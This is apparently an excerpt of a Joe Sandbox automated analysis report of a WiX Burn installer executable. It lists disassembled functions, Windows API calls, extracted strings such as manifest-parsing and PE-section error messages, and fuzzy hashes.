Part of subcall function 00651175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006511C2
Part of subcall function 00651175: GetLastError.KERNEL32(?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 006511D7

CloseHandle.KERNEL32(?,?,?,?,0069B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00651131

Strings

feclient.dll, xrefs: 006510D1
cabinet.dll, xrefs: 00651099, 00651114
msi.dll, xrefs: 006510A0
comres.dll, xrefs: 006510B5
msasn1.dll, xrefs: 006510C3
clbcatq.dll, xrefs: 006510BC
crypt32.dll, xrefs: 006510CA
version.dll, xrefs: 006510A7

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll
API String ID: 3687706282-437940732
Opcode ID: 50ac4cc5471084e903dacc21b2d7da003b88124445123353bb04208ebdcdb6a0
Instruction ID: 036f7c6a4fb0868838732184cc1fff2989f59ad423140d00551c53d954ecf05c
Opcode Fuzzy Hash: 50ac4cc5471084e903dacc21b2d7da003b88124445123353bb04208ebdcdb6a0
Instruction Fuzzy Hash: 1C21807190021CABCF209FA4ED45BEEBFBAAB09B15F105159EE11BB281D77059088BA4

Function 0066A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 0066A116
Failed to calculate working folder to ensure it exists., xrefs: 0066A0D8
Failed create working folder., xrefs: 0066A0EE

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 68db30814ab44175fffbc4d73e4a72603ae6ac4bdd26a3707bf78977a5753a58
Instruction ID: 18b7cc59b91efc98cc5bacea2f4f99ff5918c0a7e41a90df1959a50f6e556ca5
Opcode Fuzzy Hash: 68db30814ab44175fffbc4d73e4a72603ae6ac4bdd26a3707bf78977a5753a58
Instruction Fuzzy Hash: 2A018432901528FA8F226F95DD06CAEFA7BDF96B20B114259F80076211DB319F50AE95

Function 0065DF33 Relevance: 124.9, APIs: 11, Strings: 60, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0065E058
SysFreeString.OLEAUT32(00000000), ref: 0065E736

Part of subcall function 0065394F: GetProcessHeap.KERNEL32(?,?,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653960
Part of subcall function 0065394F: RtlAllocateHeap.NTDLL(00000000,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653967

Strings

Failed to find backward transaction boundary: %ls, xrefs: 0065E51D
package.cpp, xrefs: 0065DFBE, 0065E0E3, 0065E4CF, 0065E564
RollbackBoundaryForward, xrefs: 0065E2DF
RollbackLogPathVariable, xrefs: 0065E299
msi.dll, xrefs: 0065E1C8
crypt32.dll, xrefs: 0065E2BB
InstallSize, xrefs: 0065E1FF
MsiPackage, xrefs: 0065E395
Failed to parse EXE package., xrefs: 0065E389
Failed to parse target product codes., xrefs: 0065E69B
yes, xrefs: 0065E187
comres.dll, xrefs: 0065E234
Failed to allocate memory for package structs., xrefs: 0065E0EF
RollbackBoundary, xrefs: 0065DF56
ExePackage, xrefs: 0065E357
Invalid cache type: %ls, xrefs: 0065E6EA
Permanent, xrefs: 0065E235
Size, xrefs: 0065E1E4
Failed to get @Cache., xrefs: 0065E6FA
Failed to parse MSP package., xrefs: 0065E531
feclient.dll, xrefs: 0065E298
cabinet.dll, xrefs: 0065E1FE
Failed to get @Size., xrefs: 0065E6D4
Failed to get @Id., xrefs: 0065E701
Failed to select package nodes., xrefs: 0065E094
CacheId, xrefs: 0065E1C9
Failed to allocate memory for MSP patch sequence information., xrefs: 0065E4DB
Failed to allocate memory for rollback boundary structs., xrefs: 0065DFCA
Failed to get @CacheId., xrefs: 0065E6DB
ETe, xrefs: 0065DF33
Failed to get rollback bundary node count., xrefs: 0065DF8E
MspPackage, xrefs: 0065E3CD
Failed to select rollback boundary nodes., xrefs: 0065DF69
Failed to get @RollbackBoundaryForward., xrefs: 0065E510
Failed to allocate memory for patch sequence information to package lookup., xrefs: 0065E570
clbcatq.dll, xrefs: 0065E219
Failed to parse payload references., xrefs: 0065E6B1
Failed to get @RollbackLogPathVariable., xrefs: 0065E4EF
Failed to get @RollbackBoundaryBackward., xrefs: 0065E527
Vital, xrefs: 0065E027, 0065E25B
Failed to find forward transaction boundary: %ls, xrefs: 0065E506
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0065E081
Failed to get @Vital., xrefs: 0065E6B8
Failed to get @Permanent., xrefs: 0065E6BF
RollbackBoundaryBackward, xrefs: 0065E319
Failed to get @InstallSize., xrefs: 0065E6CD
PerMachine, xrefs: 0065E21A
Failed to parse dependency providers., xrefs: 0065E6AA
Failed to parse MSI package., xrefs: 0065E3C1
Failed to get @LogPathVariable., xrefs: 0065E4E5
Failed to parse MSU package., xrefs: 0065E53B
Failed to get @PerMachine., xrefs: 0065E6C6
Failed to get next node., xrefs: 0065E708
always, xrefs: 0065E1A7
LogPathVariable, xrefs: 0065E276
MsuPackage, xrefs: 0065E406
Failed to get package node count., xrefs: 0065E0B1
Failed to get @InstallCondition., xrefs: 0065E4F9
InstallCondition, xrefs: 0065E2BC
Cache, xrefs: 0065E14B

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ETe$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$yes
API String ID: 336948655-3685776151
Opcode ID: 06fa6de12243eda3f201e4121a0fe6498b9060eed2705f92b118ee78980975f0
Instruction ID: 8170a559429cd47656a3b25293fb9f3da20a6204e6bec42ba50c8c7111321b86
Opcode Fuzzy Hash: 06fa6de12243eda3f201e4121a0fe6498b9060eed2705f92b118ee78980975f0
Instruction Fuzzy Hash: BC32C231D40226EBDF159F54CC41BAEB7B7AB05762F214269FD10BB290D772AE048F94

Function 0065F9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Classification, xrefs: 0065FEE2
Tag, xrefs: 0065FA57
Comments, xrefs: 0065FCA9
ParentDisplayName, xrefs: 0065FC81
Failed to get @Publisher., xrefs: 0065FBDF
ProductFamily, xrefs: 0065FE9C
Failed to get @Version., xrefs: 0065FAA4
Manufacturer, xrefs: 0065FE53
Arp, xrefs: 0065FB33
Failed to get @DisplayName., xrefs: 0065FB95
Department, xrefs: 0065FE77
Failed to get @ParentDisplayName., xrefs: 0065FC98
yes, xrefs: 0065FD36
registration.cpp, xrefs: 0065FD87
HelpTelephone, xrefs: 0065FC12
Failed to parse @Version: %ls, xrefs: 0065FAC5
Failed to select ARP node., xrefs: 0065FB4F
Failed to get @HelpLink., xrefs: 0065FC04
DisplayName, xrefs: 0065FB7E
DisableModify, xrefs: 0065FCF6
Publisher, xrefs: 0065FBC8
Failed to parse related bundles, xrefs: 0065FA83
Failed to set registration paths., xrefs: 0065FF08
ExecutableName, xrefs: 0065FAF4
AboutUrl, xrefs: 0065FC37
Failed to get @HelpTelephone., xrefs: 0065FC29
Failed to select registration node., xrefs: 0065FA1C
Failed to get @DisplayVersion., xrefs: 0065FBBA
Failed to get @Register., xrefs: 0065FB70
ProviderKey, xrefs: 0065FAD3
Update, xrefs: 0065FE1E
Invalid modify disabled type: %ls, xrefs: 0065FD94
DisplayVersion, xrefs: 0065FBA3
Failed to get @Id., xrefs: 0065FA49
Failed to get @ProviderKey., xrefs: 0065FAE6
Failed to get @Comments., xrefs: 0065FCC0
ETe, xrefs: 0065F9E3
Failed to get @Name., xrefs: 0065FED4
Failed to parse software tag., xrefs: 0065FE10
clbcatq.dll, xrefs: 0065FA56
Failed to get @Classification., xrefs: 0065FEF5
Version, xrefs: 0065FA91
button, xrefs: 0065FD15
Failed to get @ProductFamily., xrefs: 0065FEB3
Registration, xrefs: 0065F9FD
Failed to get @ExecutableName., xrefs: 0065FB07
Failed to get @Contact., xrefs: 0065FCE8
DisableRemove, xrefs: 0065FDC9
UpdateUrl, xrefs: 0065FC5C
msasn1.dll, xrefs: 0065FA35
Failed to get @Manufacturer., xrefs: 0065FE66
Register, xrefs: 0065FB5D
Failed to get @AboutUrl., xrefs: 0065FC4E
PerMachine, xrefs: 0065FB12
HelpLink, xrefs: 0065FBED
Failed to get @DisableModify., xrefs: 0065FDB8
Failed to get @PerMachine., xrefs: 0065FB25
Name, xrefs: 0065FEC1
Failed to get @UpdateUrl., xrefs: 0065FC73
Failed to select Update node., xrefs: 0065FE3C
Failed to get @DisableRemove., xrefs: 0065FDE0
Failed to get @Department., xrefs: 0065FE8E
Failed to get @Tag., xrefs: 0065FA6A
Contact, xrefs: 0065FCD1

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ETe$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 760788290-2713672406
Opcode ID: adf0a4b624ea122ee1394782aab47da39ca789b897542a0528d3270fe3e10a2e
Instruction ID: d08c7d7df2e267ed493af7015cf4ad80f0154992a335f588b22ba39621735467
Opcode Fuzzy Hash: adf0a4b624ea122ee1394782aab47da39ca789b897542a0528d3270fe3e10a2e
Instruction Fuzzy Hash: 3DE10A36E44275BBCF11A764CC42EAEB6ABAB07711F120235FD11FB651DB619E089BC0

Function 0065B48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 0065B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B550
GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 0065B556
ReadFile.KERNELBASE(00000000,aDeH,00000040,?,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B59E
GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 0065B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B7BD

Part of subcall function 0065394F: GetProcessHeap.KERNEL32(?,?,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653960
Part of subcall function 0065394F: RtlAllocateHeap.NTDLL(00000000,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 0065B906

Strings

Failed to read NT header., xrefs: 0065B681
PE, xrefs: 0065B698
burn, xrefs: 0065B838
Failed to seek to section info., xrefs: 0065B6F8, 0065B934
Failed to read section info., xrefs: 0065B999
Failed to seek to start of file., xrefs: 0065B581
Failed to open handle to engine process path., xrefs: 0065B52D
Failed to find Burn section., xrefs: 0065BB32
Failed to find valid DOS image header in buffer., xrefs: 0065BBEB
aDeH, xrefs: 0065B4A2, 0065B598, 0065B5EB, 0065B4AC, 0065B59B
Failed to read section info, data to short: %u, xrefs: 0065B8AA
Failed to read complete section info., xrefs: 0065B9C5
Failed to allocate memory for container sizes., xrefs: 0065BAD3
Failed to read image section header, index: %u, xrefs: 0065BBAC
Failed to allocate buffer for section info., xrefs: 0065B8E4
4, xrefs: 0065B884
Failed to read DOS header., xrefs: 0065B5CF
section.cpp, xrefs: 0065B523, 0065B577, 0065B5C5, 0065B628, 0065B677, 0065B6EE, 0065B73D, 0065B78C, 0065B7E1, 0065B898, 0065B8D8, 0065B92A, 0065B98F, 0065B9B9, 0065B9E0, 0065BAC7, 0065BB07, 0065BB26, 0065BB63, 0065BBA1, 0065BBC4, 0065BBDF
Failed to seek past optional headers., xrefs: 0065B7EB
Failed to read signature offset., xrefs: 0065B747
Failed to find valid NT image header in buffer., xrefs: 0065BBD0
Failed to get total size of bundle., xrefs: 0065BA23
.wix, xrefs: 0065B830
Failed to read signature size., xrefs: 0065B796
(, xrefs: 0065B81D
Failed to read section info, unsupported version: %08x, xrefs: 0065B9F5
Failed to seek to NT header., xrefs: 0065B632
PE Header from file didn't match PE Header in memory., xrefs: 0065BB11
Failed to read complete image section header, index: %u, xrefs: 0065BB75

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aDeH$burn$section.cpp
API String ID: 3411815225-744762806
Opcode ID: 444aecea63253181a0abcc59406c554d2536ae35a2c87f8b6e67e1997d258cfd
Instruction ID: e9ac3698b87410450bc2027cbf24ce5fb5961566e33e40b8ec4cad0eff183368
Opcode Fuzzy Hash: 444aecea63253181a0abcc59406c554d2536ae35a2c87f8b6e67e1997d258cfd
Instruction Fuzzy Hash: BD121872940235ABDF30DB548D46FAA76AAEF04B52F1111A9FD04BB380EB719D44CBE4

Function 00670D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,006708BC,?,?), ref: 00670D25
GetLastError.KERNEL32(?,?,?,?,006708BC,?,?), ref: 00670D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,006708BC,?,?), ref: 00670D74
GetLastError.KERNEL32(?,?,?,?,006708BC,?,?), ref: 00670D7F
ResetEvent.KERNEL32(?,?,?,?,?,006708BC,?,?), ref: 00670DB7
GetLastError.KERNEL32(?,?,?,?,006708BC,?,?), ref: 00670DC1

Strings

Failed to create file: %ls, xrefs: 00671001
Failed to reset begin operation event., xrefs: 00670DEF, 00670F2B
Failed to set end of file., xrefs: 00671094
Failed to copy stream name: %ls, xrefs: 00670E50
Failed to set file pointer to end of file., xrefs: 0067104F
Failed to allocate buffer for stream., xrefs: 00670F93
Failed to set file pointer to beginning of file., xrefs: 006710D8
Failed to set operation complete event., xrefs: 00670D5D, 00670E9E
Invalid operation for this state., xrefs: 00670E1D
cabextract.cpp, xrefs: 00670D53, 00670DA3, 00670DE5, 00670E11, 00670E94, 00670EDC, 00670F21, 00670F89, 00670FF4, 00671045, 0067108A, 006710CE
Failed to wait for begin operation event., xrefs: 00670DAD, 00670EE6

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 4904d76a007d867828e4b7272949bb8e2038bdff8e320223b6bf2569d962c358
Instruction ID: 10cb894dddc8167815ac3cbfa101ceb8afba1af4c858e2d55c14afbe1d8727a6
Opcode Fuzzy Hash: 4904d76a007d867828e4b7272949bb8e2038bdff8e320223b6bf2569d962c358
Instruction Fuzzy Hash: C3911C37980632B7E7312AE95E09B6A6957BF06B60F128217FE18BE7C0D751DC00C5E6

Function 00655195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00655217

Part of subcall function 006904F8: InitializeCriticalSection.KERNEL32(006BB5FC,?,00655223,00000000,?,?,?,?,?,?), ref: 0069050F

Part of subcall function 0065120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0065523F,00000000,?), ref: 00651248
Part of subcall function 0065120A: GetLastError.KERNEL32(?,?,?,0065523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00651252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00655285

Part of subcall function 00690E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00690E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00655317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00655321
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0065558E

Strings

Failed to initialize COM., xrefs: 00655291
Failed to run untrusted mode., xrefs: 006554B6
engine.cpp, xrefs: 00655345
Failed to initialize Wiutil., xrefs: 006552E1
Failed to run per-machine mode., xrefs: 0065546C
3.11.1.2318, xrefs: 00655384
Failed to run per-user mode., xrefs: 00655494
Failed to initialize Regutil., xrefs: 006552C9
Failed to initialize core., xrefs: 006553C3
Invalid run mode., xrefs: 006553F9
Failed to initialize XML util., xrefs: 006552F9
Failed to initialize engine state., xrefs: 0065526C
Failed to parse command line., xrefs: 00655245
Failed to get OS info., xrefs: 0065534F
Failed to initialize Cryputil., xrefs: 006552A6
Failed to run RunOnce mode., xrefs: 0065541C
Failed to run embedded mode., xrefs: 00655444

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: 527e71e841be0483d1f927f34cc78e2ea011656a3772952cd21a5c6228b3c93a
Instruction ID: 2091189b54faa92aa592763d8aa92053b2f465c4688a8a4cbb9d7260de592d90
Opcode Fuzzy Hash: 527e71e841be0483d1f927f34cc78e2ea011656a3772952cd21a5c6228b3c93a
Instruction Fuzzy Hash: D4B1D471D406299BDF31AF64CD5ABED76BBAF04712F0100D9ED0AA6240DB709E88CF94

Function 0066752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get unique temporary folder for bootstrapper application., xrefs: 006677CE
Failed to initialize internal cache functionality., xrefs: 0066779F
WixBundleUILevel, xrefs: 006676D6, 006676E7
Failed to overwrite the %ls built-in variable., xrefs: 006676BB
Failed to get manifest stream from container., xrefs: 006675CC
Failed to initialize variables., xrefs: 00667571
Failed to set source process path variable., xrefs: 00667709
Failed to extract bootstrapper application payloads., xrefs: 006677EF
Failed to open manifest stream., xrefs: 006675AB
WixBundleSourceProcessPath, xrefs: 006676F8
Failed to get source process folder from path., xrefs: 00667725
Failed to parse command line., xrefs: 00667667
WixBundleSourceProcessFolder, xrefs: 00667734
Failed to open attached UX container., xrefs: 0066758E
Failed to set original source variable., xrefs: 0066776A
WixBundleElevated, xrefs: 006676A5, 006676B6
WixBundleOriginalSource, xrefs: 00667759
Failed to load manifest., xrefs: 006675E8
Failed to load catalog files., xrefs: 0066780F
Failed to set source process folder variable., xrefs: 00667745

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
